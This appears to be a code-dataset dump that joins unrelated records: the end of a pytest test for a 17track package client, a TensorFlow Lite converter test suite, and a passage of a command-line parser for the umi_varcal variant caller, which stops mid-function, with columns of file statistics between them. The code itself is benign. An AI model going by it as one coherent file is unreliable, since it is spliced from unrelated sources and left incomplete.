@pytest.mark.asyncio
async def test_add_existing_package(aresponses):
"""Test adding an existing new package."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("add_package_existing_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(RequestError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321")
| 32.086207
| 93
| 0.63962
| 1,207
| 11,166
| 5.783761
| 0.111019
| 0.04412
| 0.069618
| 0.100559
| 0.852743
| 0.852743
| 0.837989
| 0.820656
| 0.820656
| 0.807907
| 0
| 0.042478
| 0.240999
| 11,166
| 347
| 94
| 32.178674
| 0.781239
| 0.003135
| 0
| 0.752542
| 0
| 0
| 0.203587
| 0.094638
| 0
| 0
| 0
| 0
| 0.077966
| 1
| 0
| false
| 0.044068
| 0.023729
| 0
| 0.023729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53d18782933e9df7d7c45f5bbe9a1d7c78295471
| 23,039
|
py
|
Python
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 54
|
2018-05-29T19:52:44.000Z
|
2021-11-30T10:41:12.000Z
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 20
|
2017-12-06T18:20:54.000Z
|
2021-11-10T09:54:23.000Z
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 31
|
2018-09-11T02:17:17.000Z
|
2021-12-15T10:33:35.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'None is only supported in the 1st dimension. Tensor '
'\'Placeholder_1:0\' has invalid shape \'[1, None, 16, 3]\'.',
str(error.exception))
def testBatchSizeValid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + var
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.output_format = lite_constants.GRAPHVIZ_DOT
graphviz_output = converter.convert()
self.assertTrue(graphviz_output)
def testInferenceInputType(self):
in_tensor = array_ops.placeholder(shape=[1, 16, 16, 3], dtype=dtypes.uint8)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_input_type = lite_constants.QUANTIZED_UINT8
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
def testDefaultRangesStats(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
converter.default_ranges_stats = (0, 6) # min, max
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
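# An explanatory aside on the quantization tuples asserted above (an addition,
# not part of the original test): the interpreter reports each tensor's
# quantization as (scale, zero_point), where real_value = scale *
# (quantized_value - zero_point). From quantized_input_stats of
# (mean, std_dev) = (0., 1.) the converter derives scale = 1. / std_dev = 1.
# and zero_point = mean = 0, hence the input's (1., 0.); the output's scale
# comes from default_ranges_stats = (0, 6), so it is only checked to be > 0.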
class FromFrozenGraphTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFloatWithShapesArray(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(
graph_def_file, ['Placeholder'], ['add'],
input_shapes={'Placeholder': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + var
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Ensure the graph with variables cannot be converted.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual('Please freeze the graph using freeze_graph.py',
str(error.exception))
def testPbtxt(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt')
write_graph(sess.graph_def, '', graph_def_file, True)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testInvalidFile(self):
graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file')
with gfile.Open(graph_def_file, 'wb') as temp_file:
temp_file.write(b'bad data')  # bytes, since the file is opened in binary ('wb') mode
temp_file.flush()
# Attempts to convert the invalid model.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual(
'Unable to parse input file \'{}\'.'.format(graph_def_file),
str(error.exception))
class FromSavedModelTest(test_util.TensorFlowTestCase):
def _createSavedModel(self, shape):
"""Create a simple SavedModel."""
saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel')
with session.Session() as sess:
in_tensor_1 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputB')
in_tensor_2 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputA')
out_tensor = in_tensor_1 + in_tensor_2
inputs = {'x': in_tensor_1, 'y': in_tensor_2}
outputs = {'z': out_tensor}
saved_model.simple_save(sess, saved_model_dir, inputs, outputs)
return saved_model_dir
def testSimpleModel(self):
"""Test a SavedModel."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testNoneBatchSize(self):
"""Test a SavedModel, with None in input tensor's shape."""
saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testOrderInputArrays(self):
"""Test a SavedModel ordering of input arrays."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputB', 'inputA'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testSubsetInputArrays(self):
"""Test a SavedModel with a subset of the input array names of the model."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Check case where input shape is given.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir,
input_arrays=['inputA'],
input_shapes={'inputA': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check case where input shape is None.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
if __name__ == '__main__':
test.main()
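# A minimal end-to-end sketch distilled from the tests above (an illustrative
# addition, not part of the original file). It assumes the same TF 1.x modules
# already imported by this test file (array_ops, dtypes, session, lite,
# Interpreter, np) and shows the convert-then-run round trip the tests verify.
def _convert_and_run_example():
    in_tensor = array_ops.placeholder(shape=[1, 4], dtype=dtypes.float32)
    out_tensor = in_tensor + in_tensor
    sess = session.Session()
    converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
    tflite_model = converter.convert()
    interpreter = Interpreter(model_content=tflite_model)
    interpreter.allocate_tensors()
    input_index = interpreter.get_input_details()[0]['index']
    interpreter.set_tensor(input_index, np.ones((1, 4), dtype=np.float32))
    interpreter.invoke()
    # Returns [[2., 2., 2., 2.]] for the doubled input.
    return interpreter.get_tensor(interpreter.get_output_details()[0]['index'])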
| 42.11883
| 80
| 0.691957
| 2,942
| 23,039
| 5.220598
| 0.081577
| 0.100592
| 0.016277
| 0.018361
| 0.853767
| 0.827398
| 0.820301
| 0.809753
| 0.803242
| 0.796601
| 0
| 0.032072
| 0.164981
| 23,039
| 546
| 81
| 42.195971
| 0.766296
| 0.095794
| 0
| 0.7825
| 0
| 0
| 0.064874
| 0
| 0
| 0
| 0
| 0
| 0.3775
| 1
| 0.0475
| false
| 0
| 0.0425
| 0
| 0.1
| 0.0025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53ef51bb37bbad7657cf5c52a68633e87b105581
| 14,952
|
py
|
Python
|
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
# THIS FUNCTION CONFIGURES THE PARAMETERS FROM THE COMMAND LINE
# AND PROPERLY PASSES THEM TO THE CORRESPONDING FUNCTION CALLS
#
# INPUT :
# NONE
#
# VALUE : -CONFIG : (DICT) A DICTIONARY THAT CONTAINS ALL THE NECESSARY PARAMETERS AND THEIR VALUES
#
import os
import sys
import time
### import functions from the scripts in the same dir
from func import *
from PrintHelp import *
def Config():
config={}
if len(sys.argv) == 1 or "--help" in sys.argv or "-h" in sys.argv:
if "extract" in sys.argv:
PrintHelp("extract")
elif "call" in sys.argv:
PrintHelp("call")
else:
PrintHelp("general")
# configure the extraction tool
elif sys.argv[1] == "extract":
if len(sys.argv) == 2:
PrintHelp("extract")
### just in case script path contains '-' or '--'
sys.argv[0] = "None"
sys.argv.remove('extract')
# default parameters
config["bwa_threads"] = 1
### required parameters
# input : path to the bam/sam file
# fasta : path to the fasta file
# umi length : length of the umi
required = ['--input | -i', '--fasta | -f', '--umi_length | -l']
for param in required:
missing = False
for arg in param.split(" | "):
try:
test = sys.argv.index(arg)
missing = False
break
except:
missing = True
if missing:
PrintTime('error', "\tThe parameter "+param+" is required but missing !\n\t\t\tExiting...")
exit()
print("\n")
PrintTime("console", "\tConfiguring Parameters...")
# distinguish the '-' in the fasta path from the '-' used for argument flags
try:
fastaIdx = sys.argv.index("--fasta")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
try:
fastaIdx = sys.argv.index("-f")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
pass
# distinguish the '-' in the input path from the '-' used for argument flags
try:
inputIdx = sys.argv.index("--input")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
try:
inputIdx = sys.argv.index("-i")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
pass
### verify that no arguments are empty
params_in_config = ['input', 'fasta', 'umi_length']
params_mini = ['i', 'f', 'l']
params = ['--input | -i', '--fasta | -f', '--umi_length | -l']
pointer = 1
while pointer < len(sys.argv):
param = sys.argv[pointer]
try:
value = sys.argv[pointer+1]
except:
if "--" in param:
if param in ['--input', '--fasta', '--umi_length']:
PrintTime('error', "\tThe parameter "+params[params_in_config.index(param.replace("--", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("--", "") in params_in_config:
PrintTime('error', "\tThe parameter's "+params[params_in_config.index(param.replace("--", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
elif "-" in param and "--" not in param:
if param in ['-i', '-f', '-l']:
PrintTime('error', "\tThe parameter "+params[params_mini.index(param.replace("-", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("-", "") in params_mini:
PrintTime('error', "\tThe parameter's "+params[params_mini.index(param.replace("-", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
if "-" in value and len(value) == 2:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
if "--" in value and len(value) > 3:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
pointer += 2
args=""
for arg in sys.argv:
args+=" "+arg
args = args.replace("--", "|")
args = args.replace("-", "|")
args = args.split("|")
del args[0]
for arg in args:
param = arg.split(" ")[0]
value = arg.split(" ")[1]
if param == "input" or param == "i":
param = "input"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "fasta" or param == "f":
param = "fasta"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "umi_length" or param == "l":
param = "umi_length"
try:
config[param]=int(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
if param == "bwa_threads" or param == "t":
param = "bwa_threads"
try:
config[param]=int(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
return config
# configure the variant calling tool
elif sys.argv[1] == "call":
if len(sys.argv) < 3:
PrintHelp("call")
### just in case script path contains '-' or '--'
sys.argv[0] = "None"
sys.argv.remove('call')
### default values for parameters
config["min_base_quality"] = 10
config["min_read_quality"] = 20
config["min_mapping_quality"] = 20
config["min_variant_umi"] = 5
config["strand_bias_method"] = "default"
config["output"] = os.getcwd()
config["pileup"] = "None"
config["cores"] = 1
config["default_cores"] = True
config["max_hp_length"] = 7
config["alpha"] = 0.05
config["gvcf"] = False
config["keep_pileup"] = True
### required parameters
# input : path to the bam/sam file
# fasta : path to the fasta file
# bed : path to the bed file
required = ['--input | -i', '--fasta | -f', '--bed | -b']
for param in required:
missing = False
for arg in param.split(" | "):
try:
test = sys.argv.index(arg)
missing = False
break
except:
missing = True
if missing:
PrintTime('error', "\tThe parameter "+param+" is required but missing !\n\t\t\tExiting...")
exit()
# print program name
PrintProgramName()
PrintTime("console", "\tConfiguring Parameters...")
# distinguish the '-' in the fasta path from the '-' used for argument flags
try:
fastaIdx = sys.argv.index("--fasta")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
try:
fastaIdx = sys.argv.index("-f")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
pass
# distinguish the '-' in the bed path from the '-' used for argument flags
try:
bedIdx = sys.argv.index("--bed")
bedIdx+=1
sys.argv[bedIdx] = sys.argv[bedIdx].replace("-", ":")
except:
try:
bedIdx = sys.argv.index("-b")
bedIdx+=1
sys.argv[bedIdx] = sys.argv[bedIdx].replace("-", ":")
except:
pass
# distinguish the '-' in the input path from the '-' used for argument flags
try:
inputIdx = sys.argv.index("--input")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
try:
inputIdx = sys.argv.index("-i")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
pass
# distinguish the '-' in the output path from the '-' used for argument flags
try:
outputIdx = sys.argv.index("--output")
outputIdx+=1
sys.argv[outputIdx] = sys.argv[outputIdx].replace("-", ":")
except:
try:
outputIdx = sys.argv.index("-o")
outputIdx+=1
